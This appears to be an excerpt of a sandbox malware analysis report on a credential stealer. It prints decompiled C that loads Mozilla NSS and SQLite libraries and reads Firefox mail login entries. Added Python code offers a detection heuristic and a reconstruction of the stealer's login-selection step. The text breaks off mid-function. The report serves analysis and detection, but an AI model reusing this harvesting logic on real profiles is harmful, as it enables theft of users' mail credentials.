Instruction addresses for the listing above (the report's per-line address gutter, detached by extraction; rows shown as 0x00000000 carry no instruction address): 0x0040fcbc 0x0040fccc 0x0040fe8a 0x00000000 0x0040fe8c 0x0040fcdf 0x0040fce5 0x0040fcea 0x0040fcf6 0x0040fd05 0x0040fcf8 0x0040fcfc 0x0040fd02 0x0040fd10 0x0040fdea 0x0040fdf0 0x0040fdf8 0x0040fdfb 0x00000000 0x00000000 0x0040fdfe 0x00000000 0x0040fd16 0x0040fd23 0x0040fd29 0x0040fd3c 0x0040fd4d 0x0040fd59 0x0040fd5e 0x0040fd63 0x0040fd73 0x0040fd84 0x0040fd89 0x0040fd89 0x0040fd9b 0x0040fdab 0x0040fdbc 0x0040fdc1 0x0040fdcb 0x0040fdd3 0x0040fdd6 0x0040fe07 0x0040fe07 0x0040fe0c 0x00000000 0x0040fe93 0x0040fe28 0x0040fe34 0x0040fe41 0x0040fe4e 0x0040fe5b 0x0040fe68 0x0040fe75 0x0040fe82 0x0040fe87 0x00000000 0x0040fdd8 0x0040fde2 0x0040fe04 0x0040fe04 0x00000000 0x0040fe04 0x0040fdd6

APIs
• memset.MSVCRT ref: 0040FCE5
• strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
• memset.MSVCRT ref: 0040FD29
• strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
• strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
• strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
• strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
• GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
• GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
• LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
• GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
• GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
• GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
• GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
• GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
• GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
• GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
• GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
• GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
• String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
• API String ID: 2571629209-2385123308
• Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
• Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
• Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
• Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
Uniqueness

Uniqueness Score: -1.00%
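The API list above, read as a detection. This is an added example, not part of the Joe Sandbox report and not code from the sample: it parses trace lines in the report's own `Api.Module(args), ref: ADDR` shape and flags a process that resolves the SQLite query API at runtime through GetProcAddress and probes for Firefox's mozsqlite3.dll / nss3.dll. The trace lines below are constructed to mirror the listing; the rule, its `min_exports` threshold and the benign control trace are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# Exports the decompiled routine resolves by name (taken from the listing above).
SQLITE_EXPORTS = {
    "sqlite3_open", "sqlite3_prepare", "sqlite3_step", "sqlite3_column_text",
    "sqlite3_column_int", "sqlite3_column_int64", "sqlite3_finalize",
    "sqlite3_close", "sqlite3_exec",
}
# Firefox-shipped libraries the routine falls back to when no sqlite3.dll is present.
MOZILLA_LIBS = {"mozsqlite3.dll", "nss3.dll"}
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8  # the 00000008 flag seen in the LoadLibraryExA call

# One line per call, in the shape of the report's "APIs" list:
#   • Api.Module(arg1,arg2,...), ref: ADDR      or      • Api.Module ref: ADDR
_LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed trace: the same calls the report lists for this routine.
SAMPLE_TRACE = r"""
• strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
• strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
• strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
• GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
• GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
• LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
• GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
• GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
• GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
• GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
• GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
• GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
"""

# Constructed control: an application that simply uses its own sqlite3.dll.
BENIGN_TRACE = r"""
• LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 00401000
• GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00401010
• GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00401020
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int


def parse_trace(text: str) -> List[ApiCall]:
    """Parse report-style API lines; lines that do not match the shape are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


@dataclass
class Finding:
    resolved_exports: Set[str]   # SQLite exports resolved via GetProcAddress
    library_names: Set[str]      # DLL names seen in path building / loading calls
    altered_search_path: bool    # LoadLibraryExA called with LOAD_WITH_ALTERED_SEARCH_PATH

    def is_sqlite_harvester(self, min_exports: int = 4) -> bool:
        # The signal is the combination: enough of the query API resolved at runtime
        # AND a fallback to Firefox's own libraries. Firefox itself links these
        # statically; a generic SQLite user never looks for nss3.dll. Tune min_exports
        # on your own corpus (this threshold is the example's choice).
        return (len(self.resolved_exports) >= min_exports
                and bool(self.library_names & MOZILLA_LIBS))


def analyze(text: str) -> Finding:
    exports: Set[str] = set()
    libs: Set[str] = set()
    altered = False
    for call in parse_trace(text):
        if call.api == "GetProcAddress" and len(call.args) >= 2:
            if call.args[1] in SQLITE_EXPORTS:
                exports.add(call.args[1])
        elif call.api in ("strcat", "LoadLibraryA", "LoadLibraryExA", "GetModuleHandleA"):
            for a in call.args:
                name = a.lstrip("\\").lower()
                if name.endswith(".dll"):
                    libs.add(name)
        if call.api == "LoadLibraryExA" and len(call.args) >= 3:
            try:
                altered |= bool(int(call.args[2], 16) & LOAD_WITH_ALTERED_SEARCH_PATH)
            except ValueError:
                pass  # argument not recovered by the sandbox (rendered as "?")
    return Finding(exports, libs, altered)


if __name__ == "__main__":
    for label, trace in (("sample", SAMPLE_TRACE), ("benign", BENIGN_TRACE)):
        f = analyze(trace)
        print(label, f.is_sqlite_harvester(), sorted(f.resolved_exports), sorted(f.library_names))
```

The parser is deliberately forgiving: arguments the sandbox could not recover appear as `?`, so the flag check tolerates a non-numeric third argument and the library scan simply ignores non-DLL tokens. Run it against a report's API list directly; the control trace shows why the Firefox-library fallback, not the SQLite names alone, carries the signal.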

C-Code - Quality: 86%
			E0040D003(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				char* _v12;
				char* _v16;
				intOrPtr _v20;
				char _v36;
				int _v40;
				char _v60;
				char _v92;
				char _v108;
				char _v132;
				char _v164;
				void _v419;
				int _v420;
				void _v675;
				int _v676;
				void _v1291;
				char _v1292;
				void _v1907;
				char _v1908;
				void _v2523;
				char _v2524;
				char _v3548;
				char _v4572;
				char _v5596;
				char _v6620;
				char _v7644;
				void _v8667;
                                                                                                                                                                        				char _v8668;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t91;
                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                        				intOrPtr* _t101;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				char* _t122;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				char* _t149;
                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                        				int _t175;
                                                                                                                                                                        				void* _t207;
                                                                                                                                                                        				void* _t208;
                                                                                                                                                                        				intOrPtr _t209;
                                                                                                                                                                        				char* _t213;
                                                                                                                                                                        				intOrPtr _t215;
                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                        				void* _t218;
                                                                                                                                                                        				intOrPtr _t221;
                                                                                                                                                                        				char* _t225;
                                                                                                                                                                        				void* _t229;
                                                                                                                                                                        				void* _t230;
                                                                                                                                                                        				void* _t231;
                                                                                                                                                                        
                                                                                                                                                                        				_t207 = __edx;
                                                                                                                                                                        				E00412360(0x21dc, __ecx);
                                                                                                                                                                        				_t209 = _a4;
                                                                                                                                                                        				_t221 = _t209 + 0x30;
                                                                                                                                                                        				_v20 = _t221;
                                                                                                                                                                        				_t91 = E0040E54C(_t221, _t209 + 0x362);
                                                                                                                                                                        				if(_t91 == 0) {
                                                                                                                                                                        					return _t91;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t92 =  *(_t221 + 4);
                                                                                                                                                                        				_t175 = 0;
                                                                                                                                                                        				if(_t92 == 0) {
                                                                                                                                                                        					_t93 = _t92 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t93;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t93 =  *_t92(_t209);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t235 = _t93 - _t175;
                                                                                                                                                                        				if(_t93 != _t175) {
                                                                                                                                                                        					L36:
                                                                                                                                                                        					return E0040E6B4(_t221);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E00411C05(_t209, _t221, _t235, E00411BDA(_t235), _a8);
                                                                                                                                                                        					E00411EB7(_t207,  &_v164, _t235);
                                                                                                                                                                        					_t208 = E00411CB0( &_v164, "logins");
                                                                                                                                                                        					_t236 = _t208 - _t175;
                                                                                                                                                                        					if(_t208 == _t175) {
                                                                                                                                                                        						L33:
                                                                                                                                                                        						_t101 =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                        						if(_t101 != _t175) {
                                                                                                                                                                        							 *_t101();
                                                                                                                                                                        						}
                                                                                                                                                                        						E00404638( &_v108);
                                                                                                                                                                        						E00406B8A( &_v132);
                                                                                                                                                                        						E00406A7D( &_v164);
                                                                                                                                                                        						_t221 = _v20;
                                                                                                                                                                        						goto L36;
                                                                                                                                                                        					}
                                                                                                                                                                        					E00411BDA(_t236);
                                                                                                                                                                        					_t109 = E00406B3E( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 + 8)));
                                                                                                                                                                        					_t237 = _t109 - _t175;
                                                                                                                                                                        					if(_t109 == _t175) {
                                                                                                                                                                        						_t109 = 0x41344f;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v40 = _t175;
                                                                                                                                                                        					E00406CFF( &_v60, _t109);
                                                                                                                                                                        					while(E00411EB7(_t208,  &_v92, _t237) != 0) {
                                                                                                                                                                        						_v8668 = _t175;
                                                                                                                                                                        						memset( &_v8667, _t175, 0x3ff);
                                                                                                                                                                        						memset( &_v7644, _t175, 0x1400);
                                                                                                                                                                        						_t231 = _t230 + 0x18;
                                                                                                                                                                        						_t212 =  &_v92;
                                                                                                                                                                        						_t225 = E00411C8A( &_v92, "hostname");
                                                                                                                                                                        						_v16 = E00411C8A( &_v92, "encryptedUsername");
                                                                                                                                                                        						_a8 = E00411C8A( &_v92, "encryptedPassword");
                                                                                                                                                                        						_v12 = E00411C8A( &_v92, "usernameField");
                                                                                                                                                                        						_v8 = E00411C8A(_t212, "passwordField");
                                                                                                                                                                        						_t122 = E00411C8A(_t212, "httpRealm");
                                                                                                                                                                        						__eflags = _t225 - _t175;
                                                                                                                                                                        						_t213 = _t122;
                                                                                                                                                                        						if(_t225 != _t175) {
                                                                                                                                                                        							strcpy( &_v8668, _t225);
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _v16 - _t175;
                                                                                                                                                                        						if(_v16 != _t175) {
                                                                                                                                                                        							strcpy( &_v7644, _v16);
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _a8 - _t175;
                                                                                                                                                                        						if(_a8 != _t175) {
                                                                                                                                                                        							strcpy( &_v6620, _a8);
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _v12 - _t175;
                                                                                                                                                                        						if(_v12 != _t175) {
                                                                                                                                                                        							strcpy( &_v5596, _v12);
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _v8 - _t175;
                                                                                                                                                                        						if(_v8 != _t175) {
                                                                                                                                                                        							strcpy( &_v4572, _v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t213 - _t175;
                                                                                                                                                                        						if(_t213 != _t175) {
                                                                                                                                                                        							strcpy( &_v3548, _t213);
                                                                                                                                                                        						}
                                                                                                                                                                        						_v676 = _t175;
                                                                                                                                                                        						memset( &_v675, _t175, 0xff);
                                                                                                                                                                        						_v420 = _t175;
                                                                                                                                                                        						memset( &_v419, _t175, 0xff);
                                                                                                                                                                        						_t215 = _a4;
                                                                                                                                                                        						_t230 = _t231 + 0x18;
                                                                                                                                                                        						E0040CF02(_a8, _t215,  &_v420);
                                                                                                                                                                        						E0040CF02(_v16, _t215,  &_v676);
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t215 + 0x474)) - _t175;
                                                                                                                                                                        						_a8 = _t175;
                                                                                                                                                                        						if(__eflags > 0) {
                                                                                                                                                                        							_t216 = _t215 + 0x468;
                                                                                                                                                                        							__eflags = _t216;
                                                                                                                                                                        							_v8 = _t216;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t229 = E0040DA96(_a8, _v8);
                                                                                                                                                                        								_v1292 = _t175;
                                                                                                                                                                        								memset( &_v1291, _t175, 0x261);
                                                                                                                                                                        								_v2524 = _t175;
                                                                                                                                                                        								memset( &_v2523, _t175, 0x261);
                                                                                                                                                                        								_v1908 = _t175;
                                                                                                                                                                        								memset( &_v1907, _t175, 0x261);
                                                                                                                                                                        								_t56 = _t229 + 0x104; // 0x104
                                                                                                                                                                        								_t218 = _t56;
                                                                                                                                                                        								sprintf( &_v1292, "mailbox://%s", _t218);
                                                                                                                                                                        								sprintf( &_v2524, "imap://%s", _t218);
                                                                                                                                                                        								sprintf( &_v1908, "smtp://%s", _t218);
                                                                                                                                                                        								_t230 = _t230 + 0x48;
                                                                                                                                                                        								_push( &_v3548);
                                                                                                                                                                        								_t148 =  &_v1292;
                                                                                                                                                                        								_push(_t148);
                                                                                                                                                                        								L00412072();
								__eflags = _t148;
								if(_t148 == 0) {
									L26:
									_t66 = _t229 + 0x204; // 0x204
									_t149 = _t66;
									_push(_t149);
									_v12 = _t149;
									_t150 =  &_v676;
									_push(_t150);
									L00412072();
									__eflags = _t150;
									if(_t150 == 0) {
										__eflags = _v420 - _t175;
										if(_v420 != _t175) {
											_t71 = _t229 + 0x304; // 0x304
											E004060DA(0xff, _t71,  &_v420);
										}
										E004060DA(0xff, _v12,  &_v676);
										_t175 = 0;
										__eflags = 0;
									}
									goto L30;
								}
								_push( &_v3548);
								_t157 =  &_v2524;
								_push(_t157);
								L00412072();
								__eflags = _t157;
								if(_t157 == 0) {
									goto L26;
								}
								_push( &_v3548);
								_t159 =  &_v1908;
								_push(_t159);
								L00412072();
								__eflags = _t159;
								if(_t159 != 0) {
									goto L30;
								}
								goto L26;
								L30:
								_a8 =  &(_a8[1]);
								__eflags = _a8 -  *((intOrPtr*)(_a4 + 0x474));
							} while (__eflags < 0);
						}
					}
					E00404638( &_v36);
					E00406B8A( &_v60);
					E00406A7D( &_v92);
					goto L33;
				}
			}
[Address column of the decompiled listing for this function: 147 entries in the range 0x0040d003 to 0x0040d3b2, including five 0x00000000 entries; the per-address instruction text is not present in this extract, so the column cannot be realigned with the decompiled lines above.]
                                                                                                                                                                        0x0040d2de
                                                                                                                                                                        0x0040d2e4
                                                                                                                                                                        0x0040d2e5
                                                                                                                                                                        0x0040d2ea
                                                                                                                                                                        0x0040d2ee
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d343
                                                                                                                                                                        0x0040d343
                                                                                                                                                                        0x0040d34c
                                                                                                                                                                        0x0040d34c
                                                                                                                                                                        0x0040d218
                                                                                                                                                                        0x0040d209
                                                                                                                                                                        0x0040d36b
                                                                                                                                                                        0x0040d373
                                                                                                                                                                        0x0040d37a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d37a

APIs
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
  • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
  • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
  • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
• memset.MSVCRT ref: 0040D0C4
• memset.MSVCRT ref: 0040D0D6
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
• strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
• strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
• strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
• memset.MSVCRT ref: 0040D1BF
• memset.MSVCRT ref: 0040D1D3
• memset.MSVCRT ref: 0040D239
• memset.MSVCRT ref: 0040D24D
• memset.MSVCRT ref: 0040D261
• sprintf.MSVCRT ref: 0040D279
• sprintf.MSVCRT ref: 0040D28B
• sprintf.MSVCRT ref: 0040D29D
• _stricmp.MSVCRT(?,?), ref: 0040D2B3
• _stricmp.MSVCRT(?,?), ref: 0040D2CC
• _stricmp.MSVCRT(?,?), ref: 0040D2E5
• _stricmp.MSVCRT(?,00000204), ref: 0040D301
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
• String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
• API String ID: 1176642800-3943159138
• Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
• Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
• Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
• Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
Uniqueness

Uniqueness Score: -1.00%
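The API and string list above describes the mail-credential harvesting routine of the embedded MailPassView-style module: the Mozilla NSS library is loaded dynamically (LoadLibraryExA plus GetProcAddress of NSS_Init and the PK11_* functions), the profile's "logins" array is read, and for each entry the "hostname" field is compared with _stricmp against "imap://%s", "mailbox://%s" and "smtp://%s" URLs built with sprintf from the configured mail server. The Python below is an added example that reconstructs only that matching step over a constructed logins.json; it is not the sample's code and not MailPassView's, and it decrypts nothing (the encryptedUsername/encryptedPassword values can only be decrypted with the profile's NSS key database, which is what the PK11_* imports are resolved for). The field names, URL templates and the "logins" key come from the strings on this page; the server host list, the sample entries and the placeholder ciphertext values are assumptions.

```python
import json

# The three URL templates from the String ID list above; the sample builds them with sprintf.
MAIL_URL_FORMATS = ("imap://%s", "mailbox://%s", "smtp://%s")

# Field names copied out of each matching entry, as listed among the sample's strings.
HARVESTED_FIELDS = ("hostname", "httpRealm", "usernameField", "passwordField",
                    "encryptedUsername", "encryptedPassword")

# Constructed logins.json in the Mozilla layout (assumed sample data, not from the report).
# The encrypted* values are placeholders, not real NSS ciphertext.
SAMPLE_LOGINS_JSON = json.dumps({
    "nextId": 4,
    "logins": [
        {"id": 1, "hostname": "imap://mail.example.com", "httpRealm": "imap://mail.example.com",
         "formSubmitURL": None, "usernameField": "", "passwordField": "",
         "encryptedUsername": "constructed-blob-1u", "encryptedPassword": "constructed-blob-1p"},
        {"id": 2, "hostname": "SMTP://Mail.Example.com", "httpRealm": "SMTP://Mail.Example.com",
         "formSubmitURL": None, "usernameField": "", "passwordField": "",
         "encryptedUsername": "constructed-blob-2u", "encryptedPassword": "constructed-blob-2p"},
        {"id": 3, "hostname": "https://accounts.example.org", "httpRealm": None,
         "formSubmitURL": "https://accounts.example.org",
         "usernameField": "user", "passwordField": "pass",
         "encryptedUsername": "constructed-blob-3u", "encryptedPassword": "constructed-blob-3p"},
    ],
})


def mail_urls(server_host):
    """Equivalent of the three sprintf calls: one candidate URL per scheme for a server host."""
    return [fmt % server_host for fmt in MAIL_URL_FORMATS]


def harvest_targets(logins_json_text, server_hosts):
    """Return the login entries whose hostname equals one of the mail URLs built for any
    host in server_hosts.  The comparison is case-insensitive like _stricmp (ASCII folding
    is all that matters for these URLs), so mixed-case entries still match.  Only the
    fields named in the sample's strings are copied out; nothing is decrypted."""
    logins = json.loads(logins_json_text).get("logins", [])
    hits = []
    for host in server_hosts:
        wanted = {url.lower() for url in mail_urls(host)}
        for entry in logins:
            hostname = entry.get("hostname")
            if hostname is not None and hostname.lower() in wanted:
                hits.append({field: entry.get(field) for field in HARVESTED_FIELDS})
    return hits


if __name__ == "__main__":
    # Assumed server host; in the sample this would come from the mail client's account config.
    for hit in harvest_targets(SAMPLE_LOGINS_JSON, ["mail.example.com"]):
        print(hit["hostname"], "->", hit["encryptedUsername"], hit["encryptedPassword"])
```

Run against the constructed file, the two mail entries (IMAP and the mixed-case SMTP one) are selected and the ordinary HTTPS form login is ignored, which is the selection the _stricmp calls at 0040D2B3, 0040D2CC and 0040D2E5 implement. For a responder the useful fact is the inverse: if a profile's logins.json contained imap://, smtp:// or mailbox:// entries at the time this sample ran, those accounts are the ones to treat as exposed.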

C-Code - Quality: 72%
E0040D3B5(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
    char* _v8;
    int _v12;
    char* _v16;
    char* _v20;
    char* _v24;
    intOrPtr _v28;
    int _v32;
    intOrPtr _v40;
    intOrPtr _v44;
    intOrPtr _v60;
    intOrPtr _v64;
    char _v68;
    char _v72;
    void _v331;
    int _v332;
    void _v587;
    int _v588;
    void _v851;
    char _v852;
    void _v1378;
    short _v1380;
    void _v1995;
    char _v1996;
    void _v2611;
    char _v2612;
    void _v3227;
    char _v3228;
    char _v4252;
    char _v5276;
    char _v6300;
    char _v7324;
    char _v8348;
    void _v9371;
    char _v9372;
    void* __ebx;
    void* __edi;
    void* __esi;
    intOrPtr _t115;
    void* _t116;
    signed int _t117;
    signed int _t118;
    intOrPtr* _t122;
    void* _t133;
    char* _t179;
    int* _t180;
    char* _t187;
    char* _t189;
    int _t208;
    char* _t246;
    void* _t247;
    intOrPtr _t250;
    char* _t254;
    intOrPtr _t256;
    void* _t258;
    void* _t260;
    void* _t261;
    void* _t262;

    E00412360(0x249c, __ecx);                  /* 0x249c == 9372 bytes, the size of the largest local (_v9372): a stack-probe helper for this ~9 KB frame */
    _t115 = _a4;
    _t245 = _t115 + 0x362;                     /* _t245 is used below but the decompiler did not declare it */
    _t250 = _t115 + 0x30;
    _v28 = _t250;
    _t116 = E0040E54C(_t250, _t115 + 0x362);   /* the subcall listed under APIs: loads the NSS library and resolves NSS_Init/NSS_Shutdown/PK11_* by name; the first argument appears to be the context the pointers are stored in */
    if(_t116 == 0) {
        return _t116;                          /* NSS could not be loaded */
    }
    _t117 =  *(_t250 + 4);                     /* second pointer slot of that context */
    _t208 = 0;
    if(_t117 == 0) {
        _t118 = _t117 | 0xffffffff;            /* slot not resolved: treat as failure (-1) */
    } else {
        _t118 =  *_t117(_a4 + 0x158);          /* one-argument call through the resolved pointer; consistent with NSS_Init(profile_dir), which returns 0 on success (inference from the imports above) */
    }
    if(_t118 != _t208) {
        L43:
        return E0040E6B4(_v28);                /* tear down the context set up by E0040E54C (likely where NSS_Shutdown is called) */
    } else {
        _v32 = _t208;
        if(E0040FCBC( &_v68, _t245) == 0) {
            L41:
            _t122 =  *((intOrPtr*)(_v28 + 8));
            if(_t122 != _t208) {
                                                                                                                                                                        							 *_t122();
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L43;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_v12 = _t208;
                                                                                                                                                                        						_v1380 = _t208;
                                                                                                                                                                        						memset( &_v1378, _t208, 0x208);
                                                                                                                                                                        						_v852 = _t208;
                                                                                                                                                                        						memset( &_v851, _t208, 0x104);
                                                                                                                                                                        						_t261 = _t260 + 0x18;
                                                                                                                                                                        						MultiByteToWideChar(_t208, _t208, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                                                                                                                        						WideCharToMultiByte(0xfde9, _t208,  &_v1380, 0xffffffff,  &_v852, 0x104, _t208, _t208);
                                                                                                                                                                        						if(_v68 != _t208) {
                                                                                                                                                                        							_v68( &_v852,  &_v12);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v12 != _t208) {
                                                                                                                                                                        							_a8 = _t208;
                                                                                                                                                                        							if(_v64 != _t208) {
